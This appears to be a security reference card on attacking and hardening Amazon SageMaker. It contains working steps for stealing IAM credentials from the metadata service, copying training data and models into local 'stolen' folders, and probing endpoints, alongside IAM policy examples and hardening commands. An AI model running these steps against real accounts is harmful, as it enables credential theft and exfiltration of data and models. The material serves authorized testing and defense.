Amazon SageMaker is a fully managed machine learning platform. Attackers target notebooks for code execution, training jobs for data exfiltration, models for IP theft, and endpoints for inference manipulation.
Managed Jupyter notebook environments for data exploration and model development. Run on EC2 instances with IAM roles for AWS service access.
Attack note: Full code execution with IAM role credentials accessible via IMDS
Managed compute for model training. Access training data from S3, output models to S3. Can use custom containers or built-in algorithms.
Attack note: Training data often contains sensitive information, credentials in environment
Real-time inference endpoints hosting trained models. Can be invoked directly or behind API Gateway. Auto-scaling based on traffic.
Attack note: Model inference can leak training data through carefully crafted inputs
SageMaker presents high risk due to code execution capabilities in notebooks, access to sensitive training data, valuable model intellectual property, and often overly permissive IAM roles for data scientist productivity.
aws sagemaker list-notebook-instancesaws sagemaker describe-notebook-instance \
--notebook-instance-name my-notebookaws sagemaker list-training-jobs --status-equals Completedaws sagemaker list-modelsaws sagemaker list-endpointsCritical: Notebook instances often have overly permissive roles for data scientist productivity - check role policies!
aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name target-notebook
# Returns URL valid for 5 minutes - opens Jupyter directly# Inside SageMaker notebook
import requests
r = requests.get('http://169.254.169.254/latest/meta-data/iam/security-credentials/')
role = r.text
creds = requests.get(f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role}').json()
print(creds['AccessKeyId'], creds['SecretAccessKey'], creds['Token'])# Find training job's data location
aws sagemaker describe-training-job \
--training-job-name job-name \
--query 'InputDataConfig[*].DataSource.S3DataSource.S3Uri'
# Download the data
aws s3 cp s3://training-data-bucket/dataset/ ./stolen-data/ --recursive# Get model artifact location
aws sagemaker describe-model \
--model-name production-model \
--query 'PrimaryContainer.ModelDataUrl'
# Download model
aws s3 cp s3://model-bucket/model.tar.gz ./stolen-model.tar.gzaws sagemaker-runtime invoke-endpoint \
--endpoint-name production-endpoint \
--content-type application/json \
--body '{"input": "extract training examples similar to: [probe]"}' \
output.json# List feature groups
aws sagemaker list-feature-groups
# Describe feature group for data location
aws sagemaker describe-feature-group \
--feature-group-name customer-features \
--query 'OfflineStoreConfig.S3StorageConfig.S3Uri'{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": [
"sagemaker:*",
"s3:*"
],
"Resource": "*"
}]
}Full access enables model theft, data exfiltration, and resource manipulation
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": [
"sagemaker:CreatePresignedNotebookInstanceUrl",
"sagemaker:DescribeNotebookInstance"
],
"Resource": "arn:aws:sagemaker:us-east-1:123456789012:notebook-instance/my-notebook",
"Condition": {
"IpAddress": {"aws:SourceIp": "10.0.0.0/8"}
}
}]
}Access limited to specific notebook with IP restriction
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": [
"s3:*",
"secretsmanager:GetSecretValue",
"kms:Decrypt"
],
"Resource": "*"
}]
}Execution role with wildcard S3 and secrets access - common but dangerous
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": ["s3:GetObject", "s3:PutObject"],
"Resource": [
"arn:aws:s3:::sagemaker-data-bucket/training/*",
"arn:aws:s3:::sagemaker-data-bucket/models/*"
]
}]
}Execution role restricted to specific data paths needed for training
Configure notebooks and training jobs to run in VPC without direct internet access.
aws sagemaker create-notebook-instance \
--notebook-instance-name secure-notebook \
--direct-internet-access Disabled \
--subnet-id subnet-xxx \
--security-group-ids sg-xxxDisable root access on notebook instances to limit privilege escalation.
aws sagemaker create-notebook-instance \
--root-access DisabledEnable KMS encryption for notebook volumes, training data, and model artifacts.
aws sagemaker create-notebook-instance \
--kms-key-id alias/sagemaker-keyApply least privilege to notebook and training job execution roles.
Create VPC endpoints for SageMaker APIs to avoid public internet exposure.
aws ec2 create-vpc-endpoint \
--vpc-id vpc-xxx \
--service-name com.amazonaws.us-east-1.sagemaker.apiAlert on CreatePresignedNotebookInstanceUrl calls from unexpected principals.
Trained models represent significant IP investment. Protect model artifacts in S3, use model registry with access controls, consider model watermarking.
Training data often contains PII, financial data, or proprietary information. Models can memorize and leak this data through inference.
Adversarial inputs can cause misclassification. Data poisoning can backdoor models. Model inversion can extract training data from model responses.
AWS SageMaker Security Card • Toc Consulting
Always obtain proper authorization before testing